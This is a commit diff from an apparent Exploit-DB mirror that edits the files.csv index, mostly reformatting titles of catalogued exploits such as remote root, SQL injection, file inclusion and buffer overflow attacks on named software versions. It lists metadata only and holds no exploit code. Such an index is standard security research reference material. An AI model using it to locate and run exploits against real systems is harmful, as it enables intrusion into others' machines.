bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-06-24

Browse source 
12 new exploits
This commit is contained in:
Offensive Security 2015-06-24 05:02:37 +00:00
parent ec2076bbfe
commit 15dae7c288
39 changed files with 2808 additions and 2288 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

142
files.csv
View file

@ -72,11 +72,11 @@ id,file,description,date,author,platform,type,port
71,platforms/linux/local/71.c,"XGalaga 2.0.34 - Local game Exploit (Red Hat 9.0)",2003-07-31,c0wboy,linux,local,0
72,platforms/linux/local/72.c,"xtokkaetama 1.0b - Local Game Exploit (Red Hat 9.0)",2003-08-01,brahma,linux,local,0
73,platforms/windows/dos/73.c,"Trillian 0.74 - Remote Denial of Service Exploit",2003-08-01,l0bstah,windows,dos,0
74,platforms/linux/remote/74.c,"wu-ftpd 2.6.2 off-by-one Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21
74,platforms/linux/remote/74.c,"wu-ftpd 2.6.2 - off-by-one Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21
75,platforms/linux/local/75.c,"man-db 2.4.1 open_cat_stream() Local uid=man Exploit",2003-08-06,vade79,linux,local,0
76,platforms/windows/remote/76.c,"Microsoft Windows - (RPC DCOM) Remote Exploit (Universal Targets)",2003-08-07,oc192,windows,remote,135
77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x HTTP Remote Integer Overflow Exploit",2003-08-10,FX,hardware,remote,80
78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit (advanced version)",2003-08-11,Xpl017Elz,linux,remote,21
78,platforms/linux/remote/78.c,"wu-ftpd 2.6.2 - Remote Root Exploit",2003-08-11,Xpl017Elz,linux,remote,21
79,platforms/windows/local/79.c,"DameWare Mini Remote Control Server SYSTEM Exploit",2003-08-13,ash,windows,local,0
80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow Exploit",2003-08-13,"David Litchfield",windows,remote,2100
81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking PoC Exploit",2003-08-15,"ste jones",windows,remote,0
@ -344,7 +344,7 @@ id,file,description,date,author,platform,type,port
368,platforms/windows/local/368.c,"Microsoft Windows XP Task Scheduler (.job) Universal Exploit (MS04-022)",2004-07-31,houseofdabus,windows,local,0
369,platforms/linux/local/369.pl,"SoX - Local Buffer Overflow Exploit",2004-08-01,"Serkan Akpolat",linux,local,0
370,platforms/linux/dos/370.c,"Citadel/UX Remote Denial of Service Exploit (PoC)",2004-08-02,CoKi,linux,dos,0
371,platforms/linux/dos/371.c,"Apache HTTPd Arbitrary Long HTTP Headers DoS (c version)",2004-08-02,N/A,linux,dos,0
371,platforms/linux/dos/371.c,"Apache HTTPd - Arbitrary Long HTTP Headers DoS (c Version)",2004-08-02,N/A,linux,dos,0
372,platforms/linux/remote/372.c,"OpenFTPD <= 0.30.2 - Remote Exploit",2004-08-03,Andi,linux,remote,21
373,platforms/linux/remote/373.c,"OpenFTPD <= 0.30.1 (message system) Remote Shell Exploit",2004-08-04,infamous41md,linux,remote,21
374,platforms/linux/local/374.c,"SoX - (.wav) Local Buffer Overflow Exploiter",2004-08-04,Rave,linux,local,0
@ -503,7 +503,7 @@ id,file,description,date,author,platform,type,port
651,platforms/windows/dos/651.c,"Halo <= 1.05 Broadcast Client Crash Exploit",2004-11-22,"Luigi Auriemma",windows,dos,0
652,platforms/linux/remote/652.c,"Prozilla 1.3.6 - Remote Stack Overflow Exploit",2004-11-23,"Serkan Akpolat",linux,remote,8080
653,platforms/windows/dos/653.c,"Soldier of Fortune II <= 1.3 Server/Client Denial of Service Exploit",2004-11-23,"Luigi Auriemma",windows,dos,0
654,platforms/windows/remote/654.c,"Winamp <= 5.06 IN_CDDA.dll Remote Buffer Overflow Exploit",2004-11-24,k-otik,windows,remote,0
654,platforms/windows/remote/654.c,"Winamp <= 5.06 - IN_CDDA.dll Remote Buffer Overflow Exploit",2004-11-24,k-otik,windows,remote,0
655,platforms/windows/dos/655.c,"Star Wars Battlefront <= 1.1 Fake Players Denial of Service Exploit",2004-11-24,"Luigi Auriemma",windows,dos,0
657,platforms/linux/local/657.c,"atari800 - Local Root Exploit",2004-11-25,pi3,linux,local,0
658,platforms/windows/remote/658.c,"MailEnable Mail Server IMAP <= 1.52 - Remote Buffer Overflow Exploit",2004-11-25,class101,windows,remote,143
@ -577,7 +577,7 @@ id,file,description,date,author,platform,type,port
745,platforms/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (cgi-version)",2005-01-08,ZzagorR,multiple,remote,10000
746,platforms/multiple/remote/746.pl,"Webmin 1.5 - BruteForce + Command Execution",2005-01-08,ZzagorR,multiple,remote,10000
749,platforms/windows/local/749.cpp,"Microsoft Windows - Improper Token Validation Local Exploit",2005-01-11,"Cesar Cerrudo",windows,local,0
750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x Browser Overflow (c version)",2005-01-11,class101,windows,remote,6101
750,platforms/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow (c Version)",2005-01-11,class101,windows,remote,6101
753,platforms/windows/remote/753.html,"Microsoft Internet Explorer .ANI Remote Stack Overflow (0.2)",2005-01-12,Skylined,windows,remote,0
754,platforms/php/webapps/754.pl,"ITA Forum <= 1.49 SQL Injection Exploit",2005-01-13,RusH,php,webapps,0
755,platforms/windows/dos/755.c,"Breed <= patch #1 - zero-length Remote Crash Exploit",2005-01-13,"Luigi Auriemma",windows,dos,7649
@ -663,7 +663,7 @@ id,file,description,date,author,platform,type,port
839,platforms/windows/local/839.cpp,"Avaya IP Office Phone Manager Local Password Disclosure Exploit",2005-02-24,"Adrian ""pagvac"" Pastor",windows,local,0
840,platforms/cgi/webapps/840.c,"AWStats 5.7 - 6.2 - Multiple Remote Exploit",2005-02-24,Silentium,cgi,webapps,0
841,platforms/windows/dos/841.c,"Soldier of Fortune 2 <= 1.03 - _cl_guid_ - Server Crash",2005-02-24,"Luigi Auriemma",windows,dos,0
842,platforms/linux/dos/842.c,"wu-ftpd <= 2.6.2 File Globbing Denial of Service Exploit",2005-02-25,str0ke,linux,dos,0
842,platforms/linux/dos/842.c,"wu-ftpd <= 2.6.2 - File Globbing Denial of Service Exploit",2005-02-25,str0ke,linux,dos,0
843,platforms/windows/dos/843.c,"Knet <= 1.04c Buffer Overflow Denial of Service Exploit",2005-02-25,CorryL,windows,dos,0
844,platforms/windows/local/844.asm,"eXeem 0.21 - Local Password Disclosure Exploit (asm)",2005-02-26,illwill,windows,local,0
845,platforms/windows/remote/845.c,"BadBlue 2.5 Easy File Sharing Remote Buffer Overflow",2005-02-27,class101,windows,remote,80
@ -879,7 +879,7 @@ id,file,description,date,author,platform,type,port
1069,platforms/php/webapps/1069.php,"UBB Threads < 6.5.2 Beta (mailthread.php) SQL Injection Exploit",2005-06-25,mh_p0rtal,php,webapps,0
1070,platforms/asp/webapps/1070.pl,"ASPNuke <= 0.80 (article.asp) SQL Injection Exploit",2005-06-27,mh_p0rtal,asp,webapps,0
1071,platforms/asp/webapps/1071.pl,"ASPNuke <= 0.80 (comment_post.asp) SQL Injection Exploit",2005-06-27,"Alberto Trivero",asp,webapps,0
1072,platforms/multiple/dos/1072.cpp,"Stream / Raped Denial of Service Attack (win version)",2005-06-27,"Marco Del Percio",multiple,dos,0
1072,platforms/multiple/dos/1072.cpp,"Stream / Raped - Denial of Service Attack (Windows Version)",2005-06-27,"Marco Del Percio",multiple,dos,0
1073,platforms/solaris/local/1073.c,"Solaris 9 / 10 ld.so Local Root Exploit (1)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0
1074,platforms/solaris/local/1074.c,"Solaris 9 / 10 - ld.so Local Root Exploit (2)",2005-06-28,"Przemyslaw Frasunek",solaris,local,0
1075,platforms/windows/remote/1075.c,"Microsoft Windows Message Queuing BoF Universal Exploit (MS05-017) (v.0.3)",2005-06-29,houseofdabus,windows,remote,2103
@ -1585,7 +1585,7 @@ id,file,description,date,author,platform,type,port
1875,platforms/php/webapps/1875.htm,"FunkBoard CF0.71 (profile.php) Remote User Pass Change Exploit",2006-06-04,ajann,php,webapps,0
1876,platforms/php/webapps/1876.pl,"SCart 2.0 (page) Remote Code Execution Exploit",2006-06-04,K-159,php,webapps,0
1877,platforms/php/webapps/1877.php,"Claroline <= 1.7.6 (includePath) Remote Code Execution Exploit",2006-06-05,rgod,php,webapps,0
1878,platforms/php/webapps/1878.txt,"Particle Wiki <= 1.0.2 (version) Remote SQL Injection Vulnerability",2006-06-05,FarhadKey,php,webapps,0
1878,platforms/php/webapps/1878.txt,"Particle Wiki <= 1.0.2 - Remote SQL Injection Vulnerability",2006-06-05,FarhadKey,php,webapps,0
1879,platforms/php/webapps/1879.txt,"dotWidget CMS <= 1.0.6 (file_path) Remote File Include Vulnerabilities",2006-06-05,Aesthetico,php,webapps,0
1880,platforms/linux/dos/1880.c,"Linux Kernel < 2.6.16.18 - (Netfilter NAT SNMP Module) Remote DoS Exploit",2006-06-05,"ECL Labs",linux,dos,0
1881,platforms/php/webapps/1881.txt,"DreamAccount <= 3.1 (da_path) Remote File Include Vulnerabilities",2006-06-05,Aesthetico,php,webapps,0
@ -1600,7 +1600,7 @@ id,file,description,date,author,platform,type,port
1890,platforms/php/webapps/1890.txt,"cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities",2006-06-08,"Federico Fazzi",php,webapps,0
1891,platforms/php/webapps/1891.txt,"Enterprise Payroll Systems <= 1.1 (footer) Remote Include Vulnerability",2006-06-08,Kacper,php,webapps,0
1892,platforms/php/webapps/1892.pl,"Guestex Guestbook 1.00 (email) Remote Code Execution Exploit",2006-06-08,K-sPecial,php,webapps,0
1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise <= 2.0 (ASP Version) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0
1893,platforms/asp/webapps/1893.txt,"MailEnable Enterprise <= 2.0 - (ASP Version) Multiple Vulnerabilities",2006-06-09,"Soroush Dalili",asp,webapps,0
1894,platforms/linux/dos/1894.py,"0verkill 0.16 - (ASCII-ART Game) Remote Integer Overflow Crash Exploit",2006-06-09,"Federico Fazzi",linux,dos,0
1895,platforms/php/webapps/1895.txt,"empris <= r20020923 (phormationdir) Remote Include Vulnerability",2006-06-10,Kacper,php,webapps,0
1896,platforms/php/webapps/1896.txt,"aePartner <= 0.8.3 (dir[data]) Remote Include Vulnerability",2006-06-10,Kacper,php,webapps,0
@ -1642,7 +1642,7 @@ id,file,description,date,author,platform,type,port
1932,platforms/php/webapps/1932.php,"Ultimate PHP Board <= 1.96 GOLD Multiple Vulnerabilities Exploit",2006-06-20,"Michael Brooks",php,webapps,0
1933,platforms/php/webapps/1933.txt,"BandSite CMS <= 1.1.1 (root_path) Remote File Include Vulnerabilities",2006-06-20,Kw3[R]Ln,php,webapps,0
1934,platforms/php/webapps/1934.txt,"dotProject <= 2.0.3 (baseDir) Remote File Inclusion Vulnerability",2006-06-20,h4ntu,php,webapps,0
1935,platforms/windows/dos/1935.cpp,"Winamp <= 5.21 (Midi File Header Handling) Buffer Overflow PoC",2006-06-20,BassReFLeX,windows,dos,0
1935,platforms/windows/dos/1935.cpp,"Winamp <= 5.21 - (Midi File Header Handling) Buffer Overflow PoC",2006-06-20,BassReFLeX,windows,dos,0
1936,platforms/php/webapps/1936.txt,"SmartSiteCMS 1.0 (root) Remote File Inclusion Vulnerability",2006-06-20,Archit3ct,php,webapps,0
1937,platforms/multiple/dos/1937.html,"Opera 9 (long href) Remote Denial of Service Exploit",2006-06-21,N9,multiple,dos,0
1938,platforms/php/webapps/1938.pl,"DataLife Engine <= 4.1 - Remote SQL Injection Exploit (perl)",2006-06-21,RusH,php,webapps,0
@ -1819,7 +1819,7 @@ id,file,description,date,author,platform,type,port
2121,platforms/php/webapps/2121.txt,"Torbstoff News 4 (pfad) Remote File Inclusion Vulnerability",2006-08-07,SHiKaA,php,webapps,0
2122,platforms/php/webapps/2122.txt,"ME Download System <= 1.3 (header.php) Remote Inclusion Vulnerability",2006-08-07,"Philipp Niedziela",php,webapps,0
2123,platforms/php/webapps/2123.txt,"SQLiteWebAdmin 0.1 (tpl.inc.php) Remote Include Vulnerability",2006-08-07,SirDarckCat,php,webapps,0
2124,platforms/windows/dos/2124.php,"XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (php)",2006-08-07,ratboy,windows,dos,0
2124,platforms/windows/dos/2124.php,"XChat <= 2.6.7 - (Windows Version) Remote Denial of Service Exploit (PHP)",2006-08-07,ratboy,windows,dos,0
2125,platforms/php/webapps/2125.txt,"Joomla JD-Wiki Component <= 1.0.2 - Remote Include Vulnerability",2006-08-07,jank0,php,webapps,0
2127,platforms/php/webapps/2127.txt,"Modernbill <= 1.6 (config.php) Remote File Include Vulnerability",2006-08-07,Solpot,php,webapps,0
2128,platforms/php/webapps/2128.txt,"SAPID CMS <= 1.2.3.05 (root_path) Remote File Include Vulnerabilities",2006-08-07,Kacper,php,webapps,0
@ -1841,10 +1841,10 @@ id,file,description,date,author,platform,type,port
2144,platforms/linux/local/2144.sh,"liblesstif <= 2-0.93.94-4mdk (DEBUG_FILE) Local Root Exploit",2006-08-08,"Karol Wiesek",linux,local,0
2145,platforms/hardware/remote/2145.txt,"Barracuda Spam Firewall <= 3.3.03.053 - Remote Code Execution (extra)",2006-08-08,PATz,hardware,remote,0
2146,platforms/php/webapps/2146.txt,"docpile:we <= 0.2.2 (INIT_PATH) Remote File Inclusion Vulnerabilities",2006-08-08,"Mehmet Ince",php,webapps,0
2147,platforms/windows/dos/2147.pl,"XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (perl)",2006-08-08,Elo,windows,dos,0
2147,platforms/windows/dos/2147.pl,"XChat <= 2.6.7 - (Windows version) Remote Denial of Service Exploit (Perl)",2006-08-08,Elo,windows,dos,0
2148,platforms/php/webapps/2148.txt,"phNNTP <= 1.3 (article-raw.php) Remote File Include Vulnerability",2006-08-08,Drago84,php,webapps,0
2149,platforms/php/webapps/2149.txt,"Hitweb <= 4.2.1 (REP_INC) Remote File Include Vulnerability",2006-08-08,Drago84,php,webapps,0
2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0
2150,platforms/asp/webapps/2150.txt,"CLUB-Nuke [XP] 2.0 LCID 2048 (Turkish Version) - SQL Injection",2006-08-08,ASIANEAGLE,asp,webapps,0
2151,platforms/php/webapps/2151.txt,"Cwfm <= 0.9.1 (Language) Remote File Inclusion Vulnerability",2006-08-08,"Philipp Niedziela",php,webapps,0
2152,platforms/php/webapps/2152.php,"PHP <= 4.4.3 / 5.1.4 (objIndex) Local Buffer Overflow Exploit PoC",2006-08-08,Heintz,php,webapps,0
2153,platforms/php/webapps/2153.txt,"Boite de News <= 4.0.1 (index.php) Remote File Inclusion Vulnerability",2006-08-09,"the master",php,webapps,0
@ -2396,7 +2396,7 @@ id,file,description,date,author,platform,type,port
2704,platforms/php/webapps/2704.txt,"freewebshop.org script <= 2.2.2 - Multiple Vulnerabilities",2006-11-02,Spiked,php,webapps,0
2706,platforms/php/webapps/2706.txt,"MODx CMS <= 0.9.2.1 (FCKeditor) Remote File Include Vulnerability",2006-11-03,nuffsaid,php,webapps,0
2707,platforms/php/webapps/2707.php,"PostNuke <= 0.763 (PNSV lang) Remote Code Execution Exploit",2006-11-03,Kacper,php,webapps,0
2708,platforms/windows/dos/2708.c,"Nullsoft Winamp <= 5.3 (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0
2708,platforms/windows/dos/2708.c,"Nullsoft Winamp <= 5.3 - (Ultravox-Max-Msg) Heap Overflow DoS PoC",2006-11-03,cocoruder,windows,dos,0
2709,platforms/php/webapps/2709.txt,"Creasito E-Commerce Content Manager (admin) Authentication Bypass",2006-11-03,SlimTim10,php,webapps,0
2710,platforms/php/webapps/2710.txt,"Ariadne <= 2.4 store_config[code] Remote File Include Vulnerabilities",2006-11-04,"Mehmet Ince",php,webapps,0
2711,platforms/php/webapps/2711.php,"e107 <= 0.75 - (e107language_e107cookie) Local File Include Exploit",2006-11-04,Kacper,php,webapps,0
@ -3421,7 +3421,7 @@ id,file,description,date,author,platform,type,port
3765,platforms/php/webapps/3765.txt,"opensurveypilot <= 1.2.1 - Remote File Inclusion Vulnerability",2007-04-18,"Alkomandoz Hacker",php,webapps,0
3766,platforms/php/webapps/3766.txt,"Mx Module Smartor Album FAP 2.0 RC 1 - Remote File Inclusion Vuln",2007-04-19,bd0rk,php,webapps,0
3767,platforms/asp/webapps/3767.txt,"CreaDirectory 1.2 (error.asp id) Remote SQL Injection Vulnerability",2007-04-19,CyberGhost,asp,webapps,0
3768,platforms/windows/dos/3768.pl,"Winamp <= 5.3 (WMV File) Remote Denial of Service Exploit",2007-04-19,WiLdBoY,windows,dos,0
3768,platforms/windows/dos/3768.pl,"Winamp <= 5.3 - (WMV File) Remote Denial of Service Exploit",2007-04-19,WiLdBoY,windows,dos,0
3769,platforms/linux/dos/3769.c,"eXtremail <= 2.1.1 DNS Parsing Bugs Remote Exploit PoC",2007-04-20,mu-b,linux,dos,0
3770,platforms/windows/dos/3770.pl,"Foxit Reader 2.0 (PDF) Remote Denial of Service Exploit",2007-04-20,n00b,windows,dos,0
3771,platforms/php/webapps/3771.txt,"Supasite 1.23b - Multiple Remote File Inclusion Vulnerabilities",2007-04-21,GoLd_M,php,webapps,0
@ -3655,7 +3655,7 @@ id,file,description,date,author,platform,type,port
4001,platforms/windows/local/4001.cpp,"UltraISO <= 8.6.2.2011 (Cue/Bin Files) Local Buffer Overflow Exploit",2007-05-28,n00b,windows,local,0
4002,platforms/windows/local/4002.py,"UltraISO <= 8.6.2.2011 - (Cue/Bin Files) Local Buffer Overflow Exploit (2)",2007-05-28,"Thomas Pollet",windows,local,0
4003,platforms/php/webapps/4003.sh,"Joomla Component Phil-a-Form <= 1.2.0.0 - SQL Injection Exploit",2007-05-28,CypherXero,php,webapps,0
4004,platforms/php/webapps/4004.php,"Inout Search Engine (all version) Remote Code Execution Exploit",2007-05-29,BlackHawk,php,webapps,0
4004,platforms/php/webapps/4004.php,"Inout Search Engine All Version - Remote Code Execution Exploit",2007-05-29,BlackHawk,php,webapps,0
4005,platforms/php/webapps/4005.txt,"AdminBot 9.0.5 (live_status.lib.php ROOT) RFI Vulnerability",2007-05-29,"ThE TiGeR",php,webapps,0
4006,platforms/php/webapps/4006.php,"Pheap 2.0 Admin Bypass / Remote Code Execution Exploit",2007-05-29,Silentz,php,webapps,0
4007,platforms/asp/webapps/4007.txt,"Vizayn Urun Tanitim Sistemi 0.2 (tr) Remote SQL Injection Vulnerability",2007-05-30,BAHADIR,asp,webapps,0
@ -3894,7 +3894,7 @@ id,file,description,date,author,platform,type,port
4247,platforms/windows/remote/4247.c,"Borland Interbase <= 2007 SP1 Create-Request Remote Overflow Exploit",2007-07-30,BackBone,windows,remote,3050
4248,platforms/php/webapps/4248.txt,"Joomla Component com_gmaps 1.00 (mapId) Remote SQL Injection",2007-07-31,"Mehmet Ince",php,webapps,0
4249,platforms/multiple/dos/4249.rb,"Asterisk < 1.2.22 / 1.4.8 IAX2 channel driver - Remote Crash Exploit",2007-07-31,tenkei_ev,multiple,dos,0
4250,platforms/windows/remote/4250.html,"Yahoo! Widget < 4.0.5 GetComponentVersion() Remote Overflow Exploit",2007-07-31,lhoang8500,windows,remote,0
4250,platforms/windows/remote/4250.html,"Yahoo! Widget < 4.0.5 - GetComponentVersion() Remote Overflow Exploit",2007-07-31,lhoang8500,windows,remote,0
4251,platforms/windows/dos/4251.html,"Microsoft Internet Explorer 6 DirectX Media Remote Overflow DoS Exploit",2007-07-31,DeltahackingTEAM,windows,dos,0
4252,platforms/windows/local/4252.c,"Live for Speed S1/S2/Demo - (.mpr replay) Buffer Overflow Exploit",2007-08-01,n00b,windows,local,0
4253,platforms/php/webapps/4253.pl,"paBugs <= 2.0 Beta 3 (main.php cid) Remote SQL Injection Exploit",2007-08-02,uimp,php,webapps,0
@ -4345,7 +4345,7 @@ id,file,description,date,author,platform,type,port
4700,platforms/windows/remote/4700.txt,"simple httpd <= 1.38 - Multiple Vulnerabilities",2007-12-07,"Luigi Auriemma",windows,remote,0
4701,platforms/windows/local/4701.pl,"Media Player Classic 6.4.9 MP4 File Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0
4702,platforms/windows/local/4702.pl,"Windows Media Player 6.4 MP4 File Stack Overflow PoC",2007-12-08,"SYS 49152",windows,local,0
4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 MP4 tags Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0
4703,platforms/windows/local/4703.pl,"Nullsoft Winamp 5.32 - MP4 tags Stack Overflow Exploit",2007-12-08,"SYS 49152",windows,local,0
4704,platforms/php/webapps/4704.txt,"PolDoc CMS 0.96 - (download_file.php) File Disclosure Vulnerability",2007-12-08,GoLd_M,php,webapps,0
4705,platforms/php/webapps/4705.txt,"Flat PHP Board <= 1.2 - Multiple Vulnerabilities",2007-12-09,KiNgOfThEwOrLd,php,webapps,0
4706,platforms/php/webapps/4706.txt,"Content Injector 1.53 (index.php) Remote SQL Injection Vulnerability",2007-12-09,S.W.A.T.,php,webapps,0
@ -4464,7 +4464,7 @@ id,file,description,date,author,platform,type,port
4821,platforms/php/webapps/4821.txt,"IPTBB <= 0.5.4 (viewdir id) Remote SQL Injection Vulnerability",2007-12-31,MhZ91,php,webapps,0
4822,platforms/php/webapps/4822.txt,"MyPHP Forum <= 3.0 (Final) Multiple SQL Injection Vulnerabilities",2007-12-31,x0kster,php,webapps,0
4823,platforms/php/webapps/4823.pl,"Zenphoto 1.1.3 (rss.php albumnr) Remote SQL Injection Exploit",2007-12-31,Silentz,php,webapps,0
4824,platforms/asp/webapps/4824.py,"oneSCHOOL (all versions) admin/login.asp SQL Injection Exploit",2007-12-31,Guga360,asp,webapps,0
4824,platforms/asp/webapps/4824.py,"oneSCHOOL All Versions - admin/login.asp SQL Injection Exploit",2007-12-31,Guga360,asp,webapps,0
4825,platforms/windows/remote/4825.html,"Vantage Linguistics AnswerWorks 4 API ActiveX Control BoF Exploit",2007-12-31,Elazar,windows,remote,0
4826,platforms/php/webapps/4826.pl,"WebPortal CMS <= 0.6.0 (index.php m) Remote SQL Injection Exploit",2007-12-31,x0kster,php,webapps,0
4827,platforms/php/webapps/4827.txt,"Joomla Component PU Arcade <= 2.1.3 - SQL Injection Vulnerability",2007-12-31,Houssamix,php,webapps,0
@ -7233,7 +7233,7 @@ id,file,description,date,author,platform,type,port
7693,platforms/windows/dos/7693.pl,"Perception LiteServe 2.0.1 (user) Remote Buffer Overflow PoC",2009-01-07,Houssamix,windows,dos,0
7694,platforms/windows/dos/7694.py,"Audacity 1.6.2 - (.aup) Remote off by one Crash Exploit",2009-01-07,Stack,windows,dos,0
7695,platforms/windows/local/7695.pl,"VUPlayer <= 2.49 - (.PLS) Universal Buffer Overflow Exploit",2009-01-07,SkD,windows,local,0
7696,platforms/windows/dos/7696.pl,"WinAmp GEN_MSN Plugin Heap Buffer Overflow PoC",2009-01-07,SkD,windows,dos,0
7696,platforms/windows/dos/7696.pl,"WinAmp GEN_MSN Plugin - Heap Buffer Overflow PoC",2009-01-07,SkD,windows,dos,0
7697,platforms/php/webapps/7697.txt,"PHP-Fusion Mod Members CV (job) 1.0 - SQL Injection Vulnerability",2009-01-07,IRCRASH,php,webapps,0
7698,platforms/php/webapps/7698.txt,"PHP-Fusion Mod E-Cart 1.3 (items.php CA) SQL Injection Vulnerability",2009-01-07,IRCRASH,php,webapps,0
7699,platforms/php/webapps/7699.txt,"QuoteBook (poll.inc) Remote Config File Disclosure Vulnerability",2009-01-07,Moudi,php,webapps,0
@ -7279,7 +7279,7 @@ id,file,description,date,author,platform,type,port
7739,platforms/windows/remote/7739.html,"ExcelOCX ActiveX 3.2 - (Download File) Insecure Method Exploit",2009-01-12,"Alfons Luja",windows,remote,0
7740,platforms/php/webapps/7740.txt,"PWP Wiki Processor 1-5-1 - Remote File Upload Vulnerability",2009-01-12,ahmadbady,php,webapps,0
7741,platforms/asp/webapps/7741.txt,"dMx READY (25 Products) Remote Database Disclosure Vulnerability",2009-01-12,Cyber-Zone,asp,webapps,0
7742,platforms/windows/dos/7742.txt,"Winamp <= 5.541 (mp3/aiff) Multiple Denial of Service Exploits",2009-01-12,securfrog,windows,dos,0
7742,platforms/windows/dos/7742.txt,"Winamp <= 5.541 - (mp3/aiff) Multiple Denial of Service Exploits",2009-01-12,securfrog,windows,dos,0
7743,platforms/php/webapps/7743.txt,"Realtor 747 (define.php INC_DIR) Remote File Inclusion Vulnerability",2009-01-12,ahmadbady,php,webapps,0
7744,platforms/asp/webapps/7744.txt,"Virtual GuestBook 2.1 - Remote Database Disclosure Vulnerability",2009-01-13,Moudi,asp,webapps,0
7745,platforms/windows/local/7745.py,"VUPlayer 2.49 - (.asx) (Universal) Local Buffer Overflow Exploit",2009-01-13,"Encrypt3d.M!nd ",windows,local,0
@ -7675,7 +7675,7 @@ id,file,description,date,author,platform,type,port
8154,platforms/windows/remote/8154.pl,"EFS Easy Chat Server Authentication Request Buffer Overflow Exploit (pl)",2009-03-04,Dr4sH,windows,remote,80
8155,platforms/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 File Disclosure Vulnerability",2009-03-04,Stack,windows,remote,0
8156,platforms/windows/dos/8156.txt,"Easy Web Password 1.2 - Local Heap Memory Consumption PoC",2009-03-04,Stack,windows,dos,0
8158,platforms/windows/local/8158.pl,"Winamp <= 5.541 Skin Universal Buffer Overflow Exploit",2009-03-05,SkD,windows,local,0
8158,platforms/windows/local/8158.pl,"Winamp <= 5.541 - Skin Universal Buffer Overflow Exploit",2009-03-05,SkD,windows,local,0
8159,platforms/windows/local/8159.rb,"Media Commands .m3l File Local Buffer Overflow Exploit",2009-03-05,Stack,windows,local,0
8160,platforms/windows/remote/8160.html,"SupportSoft DNA Editor Module (dnaedit.dll) Code Execution Exploit",2009-03-05,Nine:Situations:Group,windows,remote,0
8161,platforms/php/webapps/8161.txt,"celerbb 0.0.2 - Multiple Vulnerabilities",2009-03-05,"Salvatore Fresta",php,webapps,0
@ -8233,7 +8233,7 @@ id,file,description,date,author,platform,type,port
8730,platforms/php/webapps/8730.txt,"VidShare Pro Arbitrary Shell Upload Vulnerability",2009-05-19,InjEctOr5,php,webapps,0
8731,platforms/php/webapps/8731.php,"Joomla com_gsticketsystem (catid) Blind SQL Injection Exploit",2009-05-19,InjEctOr5,php,webapps,0
8732,platforms/windows/remote/8732.py,"httpdx <= 0.5b FTP Server (CWD) Remote BoF Exploit (SEH)",2009-05-19,His0k4,windows,remote,21
8733,platforms/windows/remote/8733.html,"AOL IWinAmpActiveX Class ConvertFile() Remote BoF Exploit",2009-05-19,rgod,windows,remote,0
8733,platforms/windows/remote/8733.html,"AOL IWinAmpActiveX Class ConvertFile() - Remote BoF Exploit",2009-05-19,rgod,windows,remote,0
8734,platforms/asp/webapps/8734.txt,"Namad (IMenAfzar) 2.0.0.0 - Remote File Disclosure Vulnerability",2009-05-19,Securitylab.ir,asp,webapps,0
8735,platforms/php/webapps/8735.txt,"PAD Site Scripts 3.6 Insecure Cookie Handling Vulnerability",2009-05-19,Mr.tro0oqy,php,webapps,0
8736,platforms/php/webapps/8736.pl,"Coppermine Photo Gallery <= 1.4.22 - Remote Exploit",2009-05-19,girex,php,webapps,0
@ -8266,11 +8266,11 @@ id,file,description,date,author,platform,type,port
8764,platforms/php/webapps/8764.txt,"ZaoCMS (download.php) Remote File Disclosure Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0
8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (php)",2009-05-22,racle,windows,remote,0
8766,platforms/php/webapps/8766.txt,"Tutorial Share <= 3.5.0 Insecure Cookie Handling Vulnerability",2009-05-22,Evil-Cod3r,php,webapps,0
8767,platforms/windows/dos/8767.c,"Winamp 5.551 MAKI Parsing Integer Overflow PoC",2009-05-22,n00b,windows,dos,0
8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow PoC",2009-05-22,n00b,windows,dos,0
8769,platforms/php/webapps/8769.txt,"ZaoCMS (user_id) Remote SQL Injection Vulnerability",2009-05-22,Qabandi,php,webapps,0
8770,platforms/windows/local/8770.py,"Winamp <= 5.55 (MAKI script) Universal Seh Overwrite Exploit",2009-05-22,His0k4,windows,local,0
8770,platforms/windows/local/8770.py,"Winamp <= 5.55 - (MAKI script) Universal Seh Overwrite Exploit",2009-05-22,His0k4,windows,local,0
8771,platforms/php/webapps/8771.htm,"ZaoCMS (user_updated.php) Remote Change Password Exploit",2009-05-22,"ThE g0bL!N",php,webapps,0
8772,platforms/windows/local/8772.pl,"Winamp <= 5.55 (MAKI script) Universal Integer Overflow Exploit",2009-05-22,"Encrypt3d.M!nd ",windows,local,0
8772,platforms/windows/local/8772.pl,"Winamp <= 5.55 - (MAKI script) Universal Integer Overflow Exploit",2009-05-22,"Encrypt3d.M!nd ",windows,local,0
8773,platforms/php/webapps/8773.txt,"ZaoCMS (PhpCommander) Arbitary Remote File Upload Vulnerability",2009-05-22,Qabandi,php,webapps,0
8774,platforms/php/webapps/8774.htm,"Mole Group Sky Hunter/Bus Ticket Scripts Change Admin Pass Exploit",2009-05-22,G4N0K,php,webapps,0
